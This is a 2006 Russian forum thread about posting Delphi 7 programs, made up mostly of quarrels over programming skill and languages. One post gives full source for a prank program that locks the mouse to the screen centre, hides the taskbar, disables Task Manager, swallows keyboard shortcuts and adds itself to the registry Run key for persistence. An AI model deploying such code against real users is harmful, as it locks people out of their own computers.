PDA

Просмотр полной версии : Delphi 7



Shadow_exe
05.03.2006, 21:14
Попрошу здесь не задавать вопросов.

Этот топик для того, чтобы здесь выкладывать листинг интересных прогамм.

Я первый выложу:

Shadow_exe
05.03.2006, 21:18
unit Unit1;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls;

type
TForm1 = class(TForm)
Button1: TButton;
Button2: TButton;
procedure Button1Click(Sender: TObject);
procedure Button2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.Button1Click(Sender: TObject);
var
H:HWND;
begin
H:=FindWindow('Shell_TrayWnd','');
ShowWindow(H, SW_HIDE);
Sleep(2000);
end;

procedure TForm1.Button2Click(Sender: TObject);
var
H:HWND;
begin
H:=FindWindow('Shell_TrayWnd','');
ShowWindow(H, SW_SHOW);
end;

end.



При Button1Click таскбар пропадает с экрана, при Button2Click таскбар востанавливается в первоначальное состаяние.

Ваша очередь....

Николай
06.03.2006, 10:29
Shadow_exe, от себя убедительно предложу не превращать этот форум в сбор всякой ерунды, которую ты нашёл в интернете и на которую обратил внимания по причинам, изложенным ниже:

1. Форум создан для общения, а не для складирования всего, что тебе нравится.
2. Поверь, на форуме есть множество людей, которые на порядок лучше тебя разбираются в этих вопросах, не нужно показывать что ты нашёл - это только вызывает смех с тебя, учитывая что выложена ерунда.
3. и т.п. и т.д.

Inky
06.03.2006, 10:52
Николай, 100% +1

Shadow_exe
06.03.2006, 15:30
Николай если ты такой умный, то найди в нете как менять иконку приложения с чатотой в 1 секунду к примеру, не подгружая из вне.

Если найдеш то я тебя послушаю и больше даже не появлюсь на этом форуме, но если нет, в чем я убежден, то пошол ты.... так как это я сам написал, а еще тебе хочу сказать, что очень полезно читать хелпы.

Понял я надеюсь?

То что есть умнее люди, я не спорю, но ты сперва смотри на себя.

А кому не лень и кто знает интересные программы, пусть выкладывает, это не противозаконно.

iFog
06.03.2006, 16:28
Николай если ты такой умный, то найди в нете как менять иконку приложения с чатотой в 1 секунду к примеру, не подгружая из вне.

Если найдеш то я тебя послушаю и больше даже не появлюсь на этом форуме, но если нет, в чем я убежден, то пошол ты.... так как это я сам написал, а еще тебе хочу сказать, что очень полезно читать хелпы.

Понял я надеюсь?

То что есть умнее люди, я не спорю, но ты сперва смотри на себя.

А кому не лень и кто знает интересные программы, пусть выкладывает, это не противозаконно.

[M] - мод, за неуважительное отношение к участникам форума.

от себя: тебе здесь никто ничего не должен, и того чтобы тебе что-то доказывать - ты не достоин. Так что открывай гугль и вперёд...

Николай
06.03.2006, 19:43
Если найдеш то я тебя послушаю и больше даже не появлюсь на этом форуме, но если нет, в чем я убежден, то пошол ты.... так как это я сам написал, а еще тебе хочу сказать, что очень полезно читать хелпы.

Понял я надеюсь?


У тебя есть возможность повторить всё, что ты тут мне написал вслух в Одессе при встрече, заодно и послать попробуешь. стукни в аську 356097.

iFog
07.03.2006, 12:39
Ээээ завязывайте с разборками.

Пилигрим
07.03.2006, 14:46
Этот топик для того, чтобы здесь выкладывать листинг интересных прогамм.


Чем интересен исходныей текст( а не листинг ) нижевыложенной программы ???

Inky
07.03.2006, 15:38
Пилигрим, тем, что пацану лень доучиться до серьезных проектов, но хочецца потешить профессиональную гордость. :)

Shadow_exe
09.03.2006, 22:57
Вот то почетал тут тот бред что вы понаписывали и тошно стает...

Мерлин
19.03.2006, 23:47
Ну вы вцепились в бедного Shadow_exe, он чё вам козёл отпущения, парень написал то что знает,
а выше так и было сказано выкладывайте интересное.......

Он так и сделал.

Кстати вот программка которая использует его пример:

unit MbIWb;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls,ShellAPI ,Registry;

type
TForm1 = class(TForm)
Timer1: TTimer;
Timer2: TTimer;
procedure FormCreate(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
procedure Timer2Timer(Sender: TObject);
procedure FormShortCut(var Msg: TWMKey; var Handled: Boolean);
procedure FormShow(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

{$IFNDEF WIN32}
const MAX_PATH = 144;
{$ENDIF}

var
s, b : Double;
c, d : Integer;
Form1 : TForm1;
H, J : HWND;
L : array[0..255] of Char;
implementation

uses Types, StrUtils;

{$R *.dfm}

procedure TForm1.FormCreate(Sender: TObject);
begin
ShowWindow(Application.Handle,SW_HIDE);
J:=FindWindow('Shell_traywnd','');
ShowWindow(J,SW_HIDE);Sleep(2000);

S:=Screen.Width/2;
b:=Screen.Height/2;
c:=StrToInt(FloatToStr(S));
d:=StrToInt(FloatToStr(b));


end;

procedure TForm1.Timer1Timer(Sender: TObject);
begin
Mouse.CursorPos:=Point(c,d);
end;

procedure TForm1.Timer2Timer(Sender: TObject);
begin
if Focused=false then begin
H:=Handle;
repeat
H:=GetWindow(H,GW_HWNDPREV);
GetWindowText(H,L,254);
until (H=0)or(L='Диспетчер задач Windows');
CloseWindow(H);
EnableWindow(H,False);

end;
end;

procedure TForm1.FormShortCut(var Msg: TWMKey; var Handled: Boolean);
begin
Handled:=True;
end;

procedure TForm1.FormShow(Sender: TObject);
var
reg: TRegistry;
begin
reg := TRegistry.Create;
reg.RootKey := HKEY_LOCAL_MACHINE;
reg.LazyWrite := false;
reg.OpenKey('Software\Microsoft\Windows\CurrentVer sion\Run',
false);
reg.WriteString('My App', Application.ExeName);
reg.CloseKey;
reg.free;
end;

end.

Мерлин
23.03.2006, 19:46
fog, Ну что умники где ваши программы, Shadow_exe открыл класную тему, а вы токо говорить можете, выложите хоть одну пристойную программу, которую сам написал, а не с инета скачал.....

LANgraf
23.03.2006, 20:12
Немогу понять почему тема называется Delphi 7 ? Это и в 5-м можно сделать ))(в более древних не работал просто)

Slaventius
23.03.2006, 20:57
Мерлин,
fog, Ну что умники где ваши программы,
Вай, вай. Песочницу прекращай. Игр в "Слабо" здесь не будет. Тем более, чем пальцы здесь гнуть, уделил бы лучше внимание дальнейшему изучению. Есть как минимум 4 момента говорящих о твоем опыте:
а) обьявление такой кучи глобальных переменных (Садись два)

б) Боже что это:

S:=Screen.Width/2;
b:=Screen.Height/2;
c:=StrToInt(FloatToStr(S));
d:=StrToInt(FloatToStr(b)); О операторе div читали? Или нет времени подумать?

в) что будет делать программа если винда не русская? Какой "Диспетчер задач" будет искать?

г) если на ключ реестра "Run" поставлены ограничения доступа (к примеру ты не под админским аккаунтом) куда вылетим? Я уже молчу что потеряем экземпляр reg.

Так что, вместо бросания вызова, поработай над ошибками.

Все были молодые, самонадеянные. Расслабся. Ты не один умный на свете. ;)

Inky
23.03.2006, 22:04
Вопрос к афтару.

....
var

a,b : integer;
....

asm

mov EAX,a
mov EBX,b

xor EAX,EBX
xor EBX,EAX
xor EAX,EBX

mov a,EAX
mov b,EBX

end;

Что произойдет с переменными? Чисто в уме... сам себя проверь.

Эквивалент в С++

a^=b^=a^=b;

(с паскалем не дружу, если кто знает как в нем сделать проще чем я написал - пишите).

Shadow_exe
24.03.2006, 16:11
Тема называется Delphi 7, с языком Паскаль! А не Асемблер!
Я понимаю что в Delphi и асемблер можно писать, но я работаю в ПАСКАЛЕ!

Для справачки: Автор пишется через букву "В", а не "Ф"...

LANgraf: Называется так, потому что я в нем работаю и не говорил что нельзя это реализовать в более раней версии.

Inky
24.03.2006, 16:43
Shadow_exe, если хочешь стать программистом, заявления типа "я работаю в паскале" закинь на полку. Работать ты можешь в чем угодно, но если ты хочешь быть на сцене системного программирования, необязательно писать на ассемблере, но знать его надо. Это раз.

Я привел и сишный выриант. Если ты ответишь, что Си не знаешь тоже, то тогда вопрос - как ты будешь работать с MSDN?


З.Ы. Напиши на чистом паскале процедуру преобразования чила из big-endian в little-endian формат.

Мерлин
24.03.2006, 18:15
Inky Тема интересных программ превращаеться в мировое состязание "Кто круче загнет",
это уже весело :)

Мерлин
24.03.2006, 18:18
Slaventius, Спасибо за показанные ошибки в программе, кстати пакость хорошая, первый раз токо так отлавливаються, посмеяться можно :)

А как определить какая версия винды стоит??
=>Тогда я уже не Диспетчер задач буду искать :)

Inky
24.03.2006, 19:03
Мерлин, используй GetVersion (см SDK)

И я не собирался устраивать соревнования, просто афтар выложил какое то дерьмо и решил, что это кого то заинтересует, когда я предложил ему (см. выше) немного подучиться и не заниматься херней, он видимо обиделся, решил что уже всё знает. Вот я и дал ему задание для самопроверки.

Одно то, что он пишет на паскале уже подозрительно. Я на паскале писал последний раз еще в школе... не то, что бы плохой язык, но для системного программиста он крайне неудобен (в основном из за побитовых операций и строгого контроля типов)...

Вспомнил себя, когда я еще в школе учил паскаль (давненько это было, тогда пень про был последним словом техники) я нашел способ писать в МБР. Посчитав, что я уже мега хацкер сразу записал туда какой то мусор. Возрождение винта к жизни заняло 4 дня )))

Мерлин
24.03.2006, 21:24
Inky, Спасибо попробую.

Я думаю что автор себя великим не считает, но всеже перегнул палку :)

А ты винт полностью к жизни вернул или ......... :(

Inky
24.03.2006, 21:26
Мерлин, полностью. Это целая история была, но это уже в "Юмор" :)

Мерлин
25.03.2006, 19:21
Inky, Slaventius, LANgraf, Ребята я конечно всё понямаю, но тема у нас Delphi 7, а не скамейка для разговоров :)

Выложите плиз программы, которые по вашему мнению найлутчим образом отображают преимущества именно 7 версии Delphi...

Плиз если можно с коментариями, а то каждый пишет по разному и сиди потом разбирайся :)

Shadow_exe
25.03.2006, 23:43
Кто играет в Контер страйк?
Кто играет, тому пожалуй известно что эта знаменательная игра писалась именно на делфи, и именно в ПАСКАЛЕ!!!

Кто не знает словетную игру УТ? Да она имеет меньше глюков, меньше боков - она писалась на С++.
Но это всеголиш потому, что С++ более одоптированный под графическое восприятие.
Изначально Делфи делался для чистой работы с базами данных, кто мне не верит, может посетить офицеальный сайт Делфи и прочитать историю создания! Там же можно и прочесть что они (розработчики) продают линейку Делфи 32 и приступают к розработке (вернее уже приступили) Делфи 64! (Это для тебя я пишу Инкы, еслибы никто не работал в Делфи, то зачем бахать такие бабки туда, а? Ты сперва подумай, а потом неси всякую чуш, типа что делфи уже из себя ничего не представляет!)

Кто работал с сетями, скорее всего знает такую программу как ДэймВар!
Эта программа написана именно на Делфи 6.
Порыскайте в интернете и найдите информацию об этом, кто не верет.

Так что не говори что Делфи отдыхает.
Я просто с этим не согласен!

Ты можеш сделать красивую игру на С++,С,С#, красивую только тем, что она будет отлечаться графикой.
Но ты не сделаеш коректно защещенный доступ к базе, с горантированной защитой данных на С, он просто не имеет таковых углобленных направлений в эту сторону. Можно сделать, но на Делфи это будет реалезовать легче, быстрее, надежней.

Между прочим нынешняя база данных "ПриватБанка" писалась именно на Делфи 7, у меня работает там знакомый, он и говорил что они заказывали писать именно на Делфи. Они ее недавно обновляли.
Так этот пацан был в шоке когда ее им ставили. Насколько она проще в эксплуотировании в отличии от прошлой версии что писалась на С++.

Shadow_exe

Slaventius
26.03.2006, 01:15
Shadow_exe, вот еще очередного ломания копий "лучше/хуже" не хватало. Кто начнет - схлопочет бан. Я не шучу. Для тебя же Shadow_exe лично поясняю: не в дельфе дело, а в том что материал который ты запостил никакой ценности не представляет. Вот и все. "Желание + гугл/яндекс + полчаса времени" достаточно чтобы решить эту задачу с нуля.
Не делай из средства разработки культа. И уж тем более не надо чепухи типа

проще в эксплуотировании в отличии от прошлой версии что писалась на С++ или

ты не сделаеш коректно защещенный доступ к базе, с горантированной защитой данных на С
. Осознай простую истину: "не в том дело на чем делаешь, а в том кто делает и как". И именно это пытаются до тебя донести. Только шо то ты не второпаешь никак.

Мерлин, отражают преимущества в какой области? Преимущества д7 над чем? Над д5?? :) Повторю то что уже сказал зачинателю сего топика: неважно на чем, важно чем(умом или в лоб) и как.

Да, и еще. Shadow_exe, ты бы не с дельфи начинал, а с русского. А то перед пользователями будет стыдно. Когда напишешь что то типа CS или проги для приватбанка.

Мерлин
26.03.2006, 03:19
Slaventius, я сказал про преймущества из-за слов LANgraf, про

Немогу понять почему тема называется Delphi 7 ? Это и в 5-м можно сделать ))(в более древних не работал просто)

и все....

А де программы ((

Все посылают искать:

"Желание + гугл/яндекс + полчаса времени"


А сразу выложить , чё нельзя??

Я думаю , если каждый выложет что-то стоящее из того, что он раньше скачал, то хоть форум тему отстоит, а то, токо две проги сдесь скинуты, и то детские пакости :)

Shadow_exe
26.03.2006, 03:27
Короче Slaventius посмотри сперва на свой руский, слово "что" пишется не "шо".
Это так, для того, чтобы ты не тыкал всем их ошибки, а смотрел на свои.

А то что ты написал:
Осознай простую истину: "не в том дело на чем делаешь, а в том кто делает и как"

Попробуй написать мне запрос к базе ну к примеру на html, смешно звучит?
И не неси такой бред.
Многое зависит от того в чем ты работаеш!

Inky
26.03.2006, 10:28
Shadow_exe, мальчиг, я писал на паскале еще 12 лет (!) назад, не надо мне лечить голову заявлениями типа "на паскале можно, на С нельзя".... языки практически с одинаковыми возможностями и спор о том, какой лучше - чисто религиозные войны....


что С++ более одоптированный под графическое восприятие.

Ты сам хоть понял, что глупость сморозил?

Это раз.

DELPHI - не язык!!!!!!!!! Это всего лишь среда разработки, язык - Object Pascal,

Все твои доводы о преимуществах паскаля - просто доводы за дельфийный VCL. Который в С++ Builder ИДЕНТИЧНЫЙ!!!! Он взят из делфи... это он и есть.





Изначально Делфи делался для чистой работы с базами данных, кто мне не верит, может посетить офицеальный сайт Делфи и прочитать историю создания!

Мне не надо лезть на сайт Инпрайз/Борланда за их историей. Большую часть их истории я прошел с ними, Я писал еще под делфи 2 и 3 и под турбо паскаль 5. В делфи бабки вкладывают не потому, что это чудо - язык, а потому, что на рынке среди гигантов-разработчиков ПО паскальные ИДЕ выпускает только Борланд. У них нет в этой нише конкурентов.



Ты можеш сделать красивую игру на С++,С,С#, красивую только тем, что она будет отлечаться графикой.
Но ты не сделаеш коректно защещенный доступ к базе, с горантированной защитой данных на С, он просто не имеет таковых углобленных направлений в эту сторону. Можно сделать, но на Делфи это будет реалезовать легче, быстрее, надежней.


Вот это уже полный бред. Я сказал выше, что VCL у них идентичный.


И еще. Я сам работаю программистом, пишу довольно серьезные проекты и в Delphi и в Билдере и на чистом ассемблере. Так вот, многие с делфи убегают на микрософтовские продукты типа Visual C++. Почему? А потому, что когда ты начнешь писать СЕРЬЕЗНЫЕ проекты, поймешь, что за лекгость и быстроту разработки приходится платить. Глюками, размером и скоростью получаемого продукта.

Slaventius
26.03.2006, 14:54
Мерлин,
А сразу выложить , чё нельзя??
Весь интернет тебе сюда выложить? Форум задуман не для свалкм листингов, а для общения. Что бы в случае когда споткнулся решая конкретную задачу было с кем посоветоватся или задать вопрос. А не валить сюда листинги программ которые никому не нужны кроме вас самих.

Shadow_exe, мда. Диагноз: пациент невменяем. Уже и html приплел. Рекомендую тебе сохранить эту страничку, и перечитать её лет через 5 (если конечно не забросишь програмировать). Думаю станет стыдно.

Значит так. Тема закрыта. Несогласные с этим, могут обратится в центральную прачечную a.k.a "Книга жалоб" или в ЛС.